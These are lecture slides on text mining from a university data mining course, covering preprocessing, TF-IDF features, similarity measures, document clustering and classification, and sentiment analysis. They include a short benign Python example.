Data Mining I Text Mining Outline 1. What is Text Mining? 2. Text Preprocessing 3. Feature Creation 4. Feature Selection 5. Pattern Discovery Motivation for Text Mining Approximately 90% of the world’s data is held in unstructured formats. Source: Oracle Corporation Examples: - web pages - emails - customer complaint letters - corporate documents - scientific papers - books in digital libraries The extraction of implicit, previously unknown and potentially useful information from large amounts of textual resources. Some Text Mining Applications 1. Classification of news stories or web pages 2. Email and news filtering / SPAM detection 3. Sentiment analysis 4. Clustering documents or web pages 5. Search term auto-completion 6. Information extraction Mixture of Document Clustering and Classification Sentiment Analysis - The basic task in sentiment analysis is classifying the polarity of a given text at the document, sentence, or feature/aspect level. - Polarity values - positive, neutral, negative - likert scale (1 to 10) - Application examples - Document level - analysis of tweets about politicians - Feature/aspect level - analysis of product reviews Search Log Mining - Analysis of search queries issued by large user communities. - Applications 1. Search term auto-completion using association analysis 2. Query topic detection using classification Information Extraction - Information extraction is the task of automatically extracting structured information from unstructured or semi-structured documents. - Subtasks 1. Named Entity Recognition and Disambiguation - “The parliament in Berlin has decided …“ - Which parliament? Which Berlin? 2. Relationship Extraction - PERSON works for ORGANIZATION - PERSON located in LOCATION 3. Fact Extraction - CITY has population NUMBER - COMPANY has turnover NUMBER [Unit] Search versus Discovery Search/Query (Goal-oriented) Data Mining Structured Data Query Processing Information Retrieval Text Text Mining Discovery (Opportunistic) Data Mining The Text Mining Process 1. Text Preprocessing - Syntactic and/or semantic analysis 2. Feature Generation - Bag of words 3. Feature Selection - Reduce large number 4. Data Mining - Clustering - Classification - Association analysis 2. Text Preprocessing 1. Tokenization 2. Stopword Removal 3. Stemming 4. POS Tagging Syntactic and Linguistic Text Preprocessing - Simple Syntactic Processing - Text Cleanup (remove punctuation and HTML tags) - Tokenization (break text into single words or N-grams) - Advanced Linguistic Processing - Word Sense Disambiguation - Determine which sense a word is having. - Normalize synonyms (United States, USA, US) - Normalize pronouns (he, she, it) - Part Of Speech (POS) Tagging - Parse sentences according to grammar - Determine function of each term - e.g. John (noun) gave (verb) the (det) ball (noun). Stopword Removal - Many of the most frequently used words in English are likely to be **useless** for text mining. - These words are called *Stopwords*. - examples: the, of, and, to, an, is, that, … - typically text contains about 400 to 500 such words - for an application, an additional domain specific stopwords list may be constructed - Why should we remove stopwords? 
- Reduce data set size - stopwords account for 20-30% of total word count - Improve effectivity of text mining methods - stopwords may confuse the mining algorithm More Examples of Stopwords a about above across after again against all almost alone along already also although always am among an and another any anybody anyone anything anywhere are area areas aren't around as ask asked asking asks at away b back backed backing backs be became because become becomes been before began behind being beings below best better between big both but by c came can cannot can't case cases certain certainly clear clearly come could couldn't d did didn't differ different differently do does doesn't doing done don't down downed downing downs during e each early either end ended ending ends enough even evenly ever everybody everyone everywhere f face faces fact facts far felt few find finds first for four from full fully further furthered furthering furthers g gave general generally get gets give given gives go going good goods got greater greatest group grouped grouping groups h had hadn't has hasn't have haven't having he he'd he'll her here here's hers herself he's high higher highest him himself his how however how's i i'd if i'll i'm important in interest interested interesting interests into is isn't it its it's itself i've j just k keep keeps kind knew know known knows l large largely last later latest least less let lets let's like likely long longer longest m made make making man many may me member members men might more most mostly mr mrs much must mustn't my myself n necessary need needed needing needs never new newer newest next no nobody non noone nor not nothing now nowhere number numbers o of off often old older oldest on once one only open opened opening opens or order ordered ordering orders other others ought our ours ourselves out over own p part parted parting parts per perhaps place places point pointed pointing points possible present presented presenting presents problem problems put puts q quite r rather really right room rooms s said same saw say says second seconds see seem seemed seeming seems sees several shallshan't she she'd she'll she's should shouldn't show showed showing shows side sides since small smaller smallest so some somebody someone something somewhere state states still such sure t take taken than that that's the their theirs them themselves then there therefore there's these they they'd they'll they're they've thing things think thinks this those though thought thoughts three through thus to today together too took toward turn turned turning turns two u under until up upon us used uses v very w want wanted wanting wants was wasn't way ways we we'd well we'll wells went were we're weren't we've what's when what's where where's whether which while who whom who's whose why why's will with within without won't work worked working works would wouldn't x y year years yes yet you you'd you'll Stemming - Techniques to find the **stem of a word**. - Words: User, users, used, using ➔ Stem: use - Words: Engineering, engineered ➔ Stem: engineer - Usefulness for Text Mining - improve effectivity of text mining methods - matching of similar words - reduce term vector size - combing words with same stem may reduce the term vector as much as 40-50%. Some Basic Stemming Rules - remove endings - if a word ends with a consonant other than s, followed by an s, then delete s. - if a word ends in es, drop the s. 
- if a word ends in ing, delete the ing unless the remaining word consists only of one letter or of th. - If a word ends with ed, preceded by a consonant, delete the ed unless this leaves only a single letter. - …… - transform words - if a word ends with “ies” but not “eies” or “aies” then “ies \rightarrow y.” Preprocessing Operators in RapidMiner - To use the operators, you need to install the Text Processing Extension first. 3. Feature Generation Text Preprocessing Text Transformation (Feature Generation) Feature Selection Data Mining / Pattern Discovery Interpretation / Evaluation ### Term-Document Matrix | Term | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | Σ | |--------|----|----|----|----|----|----|----|----|----|----|----|----|----|----|----|----|----|----|----|----|----|----| | oil | 5 | 12 | 2 | 1 | 1 | 7 | 3 | 3 | 5 | 9 | 5 | 4 | 5 | 4 | 3 | 4 | 5 | 3 | 3 | 1 | 85 | | price | 5 | 6 | 2 | 2 | 0 | 8 | 1 | 2 | 2 | 10 | 5 | 1 | 5 | 2 | 0 | 3 | 3 | 3 | 3 | 0 | 63 | | opec | 0 | 15 | 0 | 0 | 0 | 8 | 1 | 2 | 2 | 6 | 5 | 2 | 2 | 4 | 0 | 0 | 0 | 0 | 0 | 0 | 47 | | mln | 0 | 4 | 0 | 0 | 2 | 4 | 1 | 0 | 0 | 3 | 9 | 0 | 0 | 0 | 0 | 0 | 3 | 3 | 0 | 2 | 31 | | market | 2 | 5 | 0 | 0 | 0 | 3 | 0 | 2 | 0 | 10 | 1 | 2 | 2 | 0 | 0 | 0 | 0 | 0 | 0 | 3 | 0 | 30 | | barrel | 2 | 0 | 1 | 1 | 0 | 4 | 0 | 0 | 1 | 3 | 3 | 0 | 1 | 1 | 0 | 3 | 3 | 1 | 0 | 2 | 26 | | bpd | 0 | 4 | 0 | 0 | 0 | 7 | 0 | 0 | 0 | 2 | 8 | 0 | 0 | 2 | 0 | 0 | 0 | 0 | 5 | 0 | 23 | | dls | 2 | 0 | 1 | 2 | 2 | 2 | 1 | 0 | 0 | 4 | 2 | 0 | 0 | 0 | 0 | 1 | 1 | 5 | 0 | 0 | 23 | | crude | 2 | 0 | 2 | 3 | 0 | 2 | 0 | 0 | 0 | 5 | 2 | 0 | 2 | 0 | 0 | 0 | 2 | 0 | 1 | 21 | | saudi | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 5 | 7 | 1 | 4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 18 | | kuwait | 0 | 0 | 0 | 0 | 0 | 10 | 0 | 1 | 0 | 3 | 0 | 1 | 0 | 2 | 0 | 0 | 0 | 0 | 0 | 0 | 17 | | offici | 0 | 0 | 0 | 0 | 0 | 5 | 1 | 1 | 0 | 1 | 4 | 3 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 17 | | meet | 0 | 6 | 0 | 0 | 0 | 3 | 0 | 1 | 0 | 1 | 0 | 2 | 0 | 2 | 0 | 0 | 0 | 0 | 0 | 0 | 14 | | pct | 0 | 0 | 0 | 0 | 2 | 0 | 2 | 2 | 2 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 2 | 14 | | product| 1 | 6 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 13 | | accord | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 5 | 1 | 0 | 2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12 | | futur | 0 | 0 | 0 | 0 | 0 | 3 | 0 | 0 | 1 | 3 | 1 | 2 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 12 | | minist | 0 | 0 | 0 | 0 | 0 | 3 | 0 | 0 | 1 | 3 | 0 | 2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12 | | govern | 0 | 0 | 0 | 0 | 0 | 0 | 5 | 0 | 6 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 | | month | 0 | 1 | 0 | 0 | 0 | 2 | 2 | 0 | 1 | 0 | 5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 | | report | 0 | 1 | 0 | 0 | 0 | 1 | 8 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 | | sheikh | 0 | 0 | 0 | 0 | 0 | 3 | 0 | 0 | 5 | 2 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 11 | | indust | 0 | 2 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 1 | 2 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 10 | | produc | 0 | 0 | 0 | 0 | 0 | 4 | 1 | 1 | 0 | 3 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 | | quota | 0 | 2 | 0 | 0 | 0 | 4 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 | | reserv | 0 | 0 | 0 | 0 | 0 | 3 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 | 3 | 0 | 0 | 10 | | world | 0 | 1 | 0 | 0 | 0 | 1 | 3 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 10 | | Σ | 48 | 204| 34 | 39 | 46 | 219| 219| 73 | 161| 180| 208| 57 | 61 | 54 | 56 | 68 | 89 | 44 | 147| 32 | 2039 | Feature Generation - Document is treated as a **bag of 
words** (or terms) - each word or term becomes a feature. - order of words/terms is ignored. - Each document is represented by a vector. - Different techniques for vector creation: 1. **Binary Term Occurrence**: Boolean attributes describe whether or not a term appears in the document. 2. **Term Occurrence**: Number of occurrences of a term in the document (problematic if documents have different length). 3. **Terms Frequency**: Attributes represent the frequency in which a term appears in the document (number of occurrences / number of words in document) 4. **TF-IDF**: see next slide The TF-IDF Term Weighting Scheme - The TF-IDF weight (term frequency–inverse document frequency) is used to evaluate how important a word is to a corpus of documents. - TF: Term Frequency (see last slide) - IDF: Inverse Document Frequency. \[ w_{ij} = tf_{ij} \times idf_i \] \[ idf_i = \log \frac{N}{df_i} \] - Gives more weight to rare words. - Give less weight to common words (domain-specific “stopwords”). Feature Generation in RapidMiner 1. Specify files to process 2. Select feature generation method 4. Feature Selection - Not all features help! - Learners might have difficulty with high dimensional data. Pruning Document Vectors in RapidMiner - Prune methods - specify if and how too frequent or too infrequent words should be ignored. - Different options: - Percentual - ignore words that appear in less / more than this percentage of all documents. - Absolute - ignore words that appear in less / more than that many documents. - By Rank - specifies how many percent of the most frequent / infrequent words are ignored. - POS tagging may be helpful for feature selection. - sometimes you want to focus on certain classes of words: - Adjectives (JJ.) for sentiment analysis - good, bad, great - Nouns (N.) for text clustering - red and blue cars are similar - red and blue trousers are similar - Rapidminer supports - PENN tag system for English - STTS tag system for German - filtering conditions are expressed as regular expressions 5. Pattern Discovery Methods: 1. Cluster Analysis 2. Classification 3. Association Analysis 5.1 Document Clustering Goal - Given a set of documents and a similarity measure among documents find clusters such that - documents in one cluster are more similar to one another - documents in separate clusters are less similar to one another - using some clustering algorithm. Applications - Topical clustering of news stories - Email message thread identification - Grouping of document versions Question - Which similarity measures are a good choice for comparing document vectors? The Jaccard coefficient is a popular similarity measure for vectors consisting of asymmetric binary attributes. 
\[ \text{sim}(x_i, x_j) = \frac{M_{11}}{M_{01} + M_{10} + M_{11}} \] Number of 1-1 matches / number of not-both-zero attribute values Binary term occurrence vector - 1 represents occurrence of a specific word - 0 represents absence of a specific word ### Example: Jaccard Coefficient - **Example document set** - d1 = “Saturn is the gas planet with rings.” - d2 = “Jupiter is the largest gas planet.” - d3 = “Saturn is the Roman god of sowing.” - **Documents as binary term occurrence vectors** <table> <thead> <tr> <th></th> <th>Saturn</th> <th>is</th> <th>the</th> <th>gas</th> <th>planet</th> <th>with</th> <th>rings</th> <th>Jupiter</th> <th>largest</th> <th>Roman</th> <th>god</th> <th>of</th> <th>sowing</th> </tr> </thead> <tbody> <tr> <td>d1</td> <td>1</td> <td>1</td> <td>1</td> <td>1</td> <td>1</td> <td>1</td> <td>1</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> </tr> <tr> <td>d2</td> <td>0</td> <td>1</td> <td>1</td> <td>1</td> <td>1</td> <td>0</td> <td>0</td> <td>1</td> <td>1</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> </tr> <tr> <td>d3</td> <td>1</td> <td>1</td> <td>1</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> <td>1</td> <td>1</td> <td>1</td> <td>1</td> </tr> </tbody> </table> - **Jaccard similarities between the documents** - \( \text{sim}(d_1,d_2) = 0.44 \) - \( \text{sim}(d_1,d_3) = 0.27 \) - \( \text{sim}(d_2,d_3) = 0.18 \) Cosine Similarity - Popular similarity measure for comparing weighted document vectors such as term-frequency or TF-IDF vectors. \[ \cos(d_1, d_2) = \frac{d_1 \cdot d_2}{\|d_1\| \|d_2\|} \] where \( \cdot \) indicates the vector dot product and \( \|d\| \) is the length of vector \( d \). - Example \[d_1 = 3\ 2\ 0\ 5\ 0\ 0\ 0\ 2\ 0\ 0\] \[d_2 = 1\ 0\ 0\ 0\ 0\ 0\ 0\ 1\ 0\ 2\] \[d_1 \cdot d_2 = 3*1 + 2*0 + 0*0 + 5*0 + 0*0 + 0*0 + 0*0 + 2*1 + 0*0 + 0*2 = 5\] \[\|d_1\| = (3^2 + 2^2 + 0^2 + 5^2 + 0^2 + 0^2 + 0^2 + 2^2 + 0^2 + 0^2)^{0.5} = (42)^{0.5} = 6.481\] \[\|d_2\| = (1^2 + 0^2 + 0^2 + 0^2 + 0^2 + 0^2 + 0^2 + 1^2 + 0^2 + 2^2)^{0.5} = (6)^{0.5} = 2.449\] \[\cos(d_1, d_2) = \frac{5}{6.481 \times 2.449} = 0.3150\] Example: Cosine Similarity and TF-IDF - A commonly used combination for text clustering. - Each document is represented by a vector of TF-IDF weights. - Sample document set: - “Saturn is the gas planet with rings.” - “Jupiter is the largest gas planet.” - “Saturn is the Roman god of sowing.” - First document as TF-IDF vector: \[ (1/7 \times \log(3/2), 1/7\times\log(3/3), 1/7\times\log(3/3), \ldots, 0, 0, 0, \ldots) \] \[ w_{ij} = tf_{ij} \times idf_i 
\] \[ idf_i = \log \frac{N}{df_i} \] Example: Cosine Similarity and TF-IDF - Sample document set - d1 = “Saturn is the gas planet with rings.” - d2 = “Jupiter is the largest gas planet.” - d3 = “Saturn is the Roman god of sowing.” - Documents as TF-IDF vectors <table> <thead> <tr> <th></th> <th>Saturn</th> <th>is</th> <th>the</th> <th>gas</th> <th>planet</th> <th>with</th> <th>rings</th> <th>Jupiter</th> <th>largest</th> <th>Roman</th> <th>god</th> <th>of</th> <th>sowing</th> </tr> </thead> <tbody> <tr> <td>d1</td> <td>0.03</td> <td>0</td> <td>0</td> <td>0.03</td> <td>0.03</td> <td>0.07</td> <td>0.07</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> </tr> <tr> <td>d2</td> <td>0</td> <td>0</td> <td>0</td> <td>0.03</td> <td>0.03</td> <td>0</td> <td>0</td> <td>0.08</td> <td>0.08</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> </tr> <tr> <td>d3</td> <td>0.03</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> <td>0.07</td> <td>0.07</td> <td>0.07</td> <td>0.07</td> </tr> </tbody> </table> - Cosine similarities between the documents - $\cos(d1,d2) = 0.13$ - $\cos(d1,d3) = 0.05$ - $\cos(d2,d3) = 0.00$ 5.2 Document Classification - Given: A collection of labeled documents (training set). - Find: A model for the class as a function of the values of the features. - Goal: Previously unseen documents should be assigned a class as accurately as possible. - Applications - Topical classification of news stories or web pages - SPAM detection - Sentiment analysis - Classification methods commonly used for text 1. Naive Bayes 2. Support Vector Machines 3. but KNN or decision trees may also work Example Application: Sentiment Analysis - Given: A text - Goal: Assign a class of sentiment to the text - e.g., positive, neutral, negative - e.g., sad, happy, angry, surprised - Can be implemented as supervised classification task - requires training data - i.e., pairs like <text; sentiment> Example Application: Sentiment Analysis - Labeling data for sentiment analysis - is expensive, like every data labeling task - Reviews from the Web may be used as labeled data. - There exist various large corpora of reviews for public download - Amazon Product Data by Julian McAuley: 142 million reviews from Amazon - WebDataCommons: 70 million reviews from 50,000 websites that use RDFa or Microdata markup Preprocessing for Sentiment Analysis - Recap – we started our processing with: Simple Syntactic Analysis • Text Cleanup (remove punctuation, HTML tags, …) • Normalize case • … - However, reasonable features for sentiment analysis might include • punctuation: use of “!”“, “?”“, “?!” • smileys (usually encoded using punctuation: ;-) ) • use of visual markup, where available (red color, bold face, …) • amount of capitalization (“screaming”) Text Classification Tricks - Finding selective words - weight words according to their correlation with label - select top-k words with highest correlation - Sentiment lexicons - use external dictionary of opinion words - Bing Liu’s List http://www.cs.uic.edu/~liub/FBS/opinion-lexicon-English.rar - restrict Rapidminer word list to these words Summary - **Main challenge in text mining: Preprocessing of text** - in order to be able to apply well known Data Mining algorithms. - **There are lots of alternative preprocessing techniques** - thus you need to experiment in order to find out which work well for your use case. 
- **Text mining can be tricky, but “ok”-ish results are easily achieved** (a minimal end-to-end sketch in Python follows after the references). Next Week: Introduction to Student Projects - **EVERY** student needs to attend the lecture next week (18.04.2018) or - inform me via email **BEFORE** the lecture - why she/he cannot attend and - if she/he already has a group or wants to get assigned to a group - If you do not attend and do not send a mail, you will be **DELETED** from the participants list. References for this Slideset - **Survey Article** - Hotho et al.: A Brief Survey of Text Mining - **Videos** - Text Mining with RapidMiner by Vancouver Data - DWS Screencast: Text Mining with RapidMiner by Robert Meusel - **Additional Tools** - Stanford NLP: Collection of open-source NLP tools - GATE: Feature-rich open-source text processing toolkit - **Additional DWS lectures covering Text Mining** - Text Analytics by Simone Ponzetto - Web Mining by Simone Ponzetto and Goran Glavaš (more on sentiment analysis)
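To make the pipeline from these slides concrete, here is a minimal, self-contained Python sketch of the steps discussed above (text cleanup, tokenization, stopword removal, TF-IDF weighting with \( w_{ij} = tf_{ij} \times idf_i \), and cosine similarity), run on the Saturn/Jupiter example documents. It is an illustration only: the stopword list is a tiny subset of a realistic one, stemming and RapidMiner are omitted, and all names are our own.

```python
import math
import re
from collections import Counter

# Toy corpus taken from the slides' running example.
docs = [
    "Saturn is the gas planet with rings.",
    "Jupiter is the largest gas planet.",
    "Saturn is the Roman god of sowing.",
]

STOPWORDS = {"is", "the", "with", "of"}  # tiny illustrative subset, not the full 400-500 words

def preprocess(text):
    """Text cleanup + tokenization (lowercase, strip punctuation) and stopword removal."""
    tokens = re.findall(r"[a-z]+", text.lower())
    return [t for t in tokens if t not in STOPWORDS]

tokens = [preprocess(d) for d in docs]
vocab = sorted({t for toks in tokens for t in toks})
N = len(docs)

# df_i: number of documents that contain term i
df = {term: sum(term in toks for toks in tokens) for term in vocab}

def tfidf_vector(toks):
    """w_ij = tf_ij * idf_i with tf = count / document length and idf = log(N / df)."""
    counts = Counter(toks)
    return [counts[t] / len(toks) * math.log(N / df[t]) for t in vocab]

vectors = [tfidf_vector(toks) for toks in tokens]

def cosine(u, v):
    """Cosine similarity: dot product divided by the product of vector lengths."""
    dot = sum(a * b for a, b in zip(u, v))
    norm = math.sqrt(sum(a * a for a in u)) * math.sqrt(sum(b * b for b in v))
    return dot / norm if norm else 0.0

print(round(cosine(vectors[0], vectors[1]), 2))  # d1 vs d2
print(round(cosine(vectors[0], vectors[2]), 2))  # d1 vs d3
print(round(cosine(vectors[1], vectors[2]), 2))  # d2 vs d3
```

With this weighting, d2 and d3 share only stopwords, so their cosine similarity is 0, mirroring the TF-IDF example in the slides.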
{"Source-Url": "http://dws.informatik.uni-mannheim.de/fileadmin/lehrstuehle/ki/Lehre/DataMining1/FSS2018/DM05-Text-Mining-FSS2018.pdf", "len_cl100k_base": 7378, "olmocr-version": "0.1.53", "pdf-total-pages": 41, "total-fallback-pages": 0, "total-input-tokens": 53856, "total-output-tokens": 8803, "length": "2e12", "weborganizer": {"__label__adult": 0.0005064010620117188, "__label__art_design": 0.0011348724365234375, "__label__crime_law": 0.0013666152954101562, "__label__education_jobs": 0.03192138671875, "__label__entertainment": 0.00033783912658691406, "__label__fashion_beauty": 0.0003352165222167969, "__label__finance_business": 0.0017824172973632812, "__label__food_dining": 0.00039768218994140625, "__label__games": 0.0013027191162109375, "__label__hardware": 0.0013151168823242188, "__label__health": 0.0007381439208984375, "__label__history": 0.0005464553833007812, "__label__home_hobbies": 0.0003445148468017578, "__label__industrial": 0.001468658447265625, "__label__literature": 0.0026149749755859375, "__label__politics": 0.000728607177734375, "__label__religion": 0.0007386207580566406, "__label__science_tech": 0.368896484375, "__label__social_life": 0.0005927085876464844, "__label__software": 0.1636962890625, "__label__software_dev": 0.41796875, "__label__sports_fitness": 0.00043487548828125, "__label__transportation": 0.0004270076751708984, "__label__travel": 0.0002267360687255859}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 20548, 0.03449]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 20548, 0.38085]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 20548, 0.86857]], "google_gemma-3-12b-it_contains_pii": [[0, 27, false], [27, 144, null], [144, 403, null], [403, 526, null], [526, 765, null], [765, 815, null], [815, 1193, null], [1193, 1399, null], [1399, 1907, null], [1907, 2091, null], [2091, 2344, null], [2344, 2430, null], [2430, 2987, null], [2987, 3543, null], [3543, 6345, null], [6345, 6724, null], [6724, 7210, null], [7210, 7330, null], [7330, 7495, null], [7495, 11018, null], [11018, 11678, null], [11678, 12113, null], [12113, 12211, null], [12211, 12319, null], [12319, 12772, null], [12772, 13208, null], [13208, 13301, null], [13301, 13798, null], [13798, 14155, null], [14155, 15104, null], [15104, 15808, null], [15808, 16334, null], [16334, 17228, null], [17228, 17735, null], [17735, 18040, null], [18040, 18458, null], [18458, 18918, null], [18918, 19279, null], [19279, 19641, null], [19641, 20015, null], [20015, 20548, null]], "google_gemma-3-12b-it_is_public_document": [[0, 27, true], [27, 144, null], [144, 403, null], [403, 526, null], [526, 765, null], [765, 815, null], [815, 1193, null], [1193, 1399, null], [1399, 1907, null], [1907, 2091, null], [2091, 2344, null], [2344, 2430, null], [2430, 2987, null], [2987, 3543, null], [3543, 6345, null], [6345, 6724, null], [6724, 7210, null], [7210, 7330, null], [7330, 7495, null], [7495, 11018, null], [11018, 11678, null], [11678, 12113, null], [12113, 12211, null], [12211, 12319, null], [12319, 12772, null], [12772, 13208, null], [13208, 13301, null], [13301, 13798, null], [13798, 14155, null], [14155, 15104, null], [15104, 15808, null], [15808, 16334, null], [16334, 17228, null], [17228, 17735, null], [17735, 18040, null], [18040, 18458, null], [18458, 18918, null], [18918, 19279, null], [19279, 19641, null], [19641, 20015, null], [20015, 20548, null]], 
"google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 20548, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 20548, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 20548, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 20548, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 20548, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 20548, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 20548, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 20548, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 20548, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 20548, null]], "pdf_page_numbers": [[0, 27, 1], [27, 144, 2], [144, 403, 3], [403, 526, 4], [526, 765, 5], [765, 815, 6], [815, 1193, 7], [1193, 1399, 8], [1399, 1907, 9], [1907, 2091, 10], [2091, 2344, 11], [2344, 2430, 12], [2430, 2987, 13], [2987, 3543, 14], [3543, 6345, 15], [6345, 6724, 16], [6724, 7210, 17], [7210, 7330, 18], [7330, 7495, 19], [7495, 11018, 20], [11018, 11678, 21], [11678, 12113, 22], [12113, 12211, 23], [12211, 12319, 24], [12319, 12772, 25], [12772, 13208, 26], [13208, 13301, 27], [13301, 13798, 28], [13798, 14155, 29], [14155, 15104, 30], [15104, 15808, 31], [15808, 16334, 32], [16334, 17228, 33], [17228, 17735, 34], [17735, 18040, 35], [18040, 18458, 36], [18458, 18918, 37], [18918, 19279, 38], [19279, 19641, 39], [19641, 20015, 40], [20015, 20548, 41]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 20548, 0.1105]]}
olmocr_science_pdfs
2024-12-07
2024-12-07
34de7be8a6ca2db850c68f79c2eabc3a6e119c6d
[REMOVED]
{"Source-Url": "http://staff.um.edu.mt/cabe2/lectures/webscience/docs/polovina_07.pdf", "len_cl100k_base": 6218, "olmocr-version": "0.1.50", "pdf-total-pages": 14, "total-fallback-pages": 0, "total-input-tokens": 26322, "total-output-tokens": 7460, "length": "2e12", "weborganizer": {"__label__adult": 0.0004682540893554687, "__label__art_design": 0.0020294189453125, "__label__crime_law": 0.0006566047668457031, "__label__education_jobs": 0.00933074951171875, "__label__entertainment": 0.0002961158752441406, "__label__fashion_beauty": 0.00032067298889160156, "__label__finance_business": 0.0011091232299804688, "__label__food_dining": 0.0005893707275390625, "__label__games": 0.0008711814880371094, "__label__hardware": 0.0007991790771484375, "__label__health": 0.0009183883666992188, "__label__history": 0.0006647109985351562, "__label__home_hobbies": 0.000263214111328125, "__label__industrial": 0.0008459091186523438, "__label__literature": 0.0038394927978515625, "__label__politics": 0.00047707557678222656, "__label__religion": 0.0008535385131835938, "__label__science_tech": 0.435791015625, "__label__social_life": 0.0004570484161376953, "__label__software": 0.0245361328125, "__label__software_dev": 0.513671875, "__label__sports_fitness": 0.00027680397033691406, "__label__transportation": 0.0008378028869628906, "__label__travel": 0.0002262592315673828}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 26523, 0.01499]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 26523, 0.71637]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 26523, 0.902]], "google_gemma-3-12b-it_contains_pii": [[0, 2485, false], [2485, 5017, null], [5017, 7458, null], [7458, 9266, null], [9266, 10287, null], [10287, 11882, null], [11882, 13804, null], [13804, 16504, null], [16504, 18645, null], [18645, 19504, null], [19504, 21465, null], [21465, 22481, null], [22481, 25282, null], [25282, 26523, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2485, true], [2485, 5017, null], [5017, 7458, null], [7458, 9266, null], [9266, 10287, null], [10287, 11882, null], [11882, 13804, null], [13804, 16504, null], [16504, 18645, null], [18645, 19504, null], [19504, 21465, null], [21465, 22481, null], [22481, 25282, null], [25282, 26523, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 26523, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 26523, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 26523, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 26523, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 26523, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 26523, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 26523, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 26523, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 26523, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 26523, null]], "pdf_page_numbers": [[0, 2485, 1], [2485, 5017, 2], [5017, 7458, 3], [7458, 9266, 4], [9266, 10287, 5], [10287, 11882, 6], [11882, 13804, 7], [13804, 16504, 8], [16504, 18645, 9], [18645, 19504, 10], [19504, 21465, 11], [21465, 22481, 12], [22481, 25282, 13], [25282, 26523, 14]], 
"pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 26523, 0.0]]}
olmocr_science_pdfs
2024-12-03
2024-12-03
3745032be2e7ecad7322abb963b656b08e7ab7b7
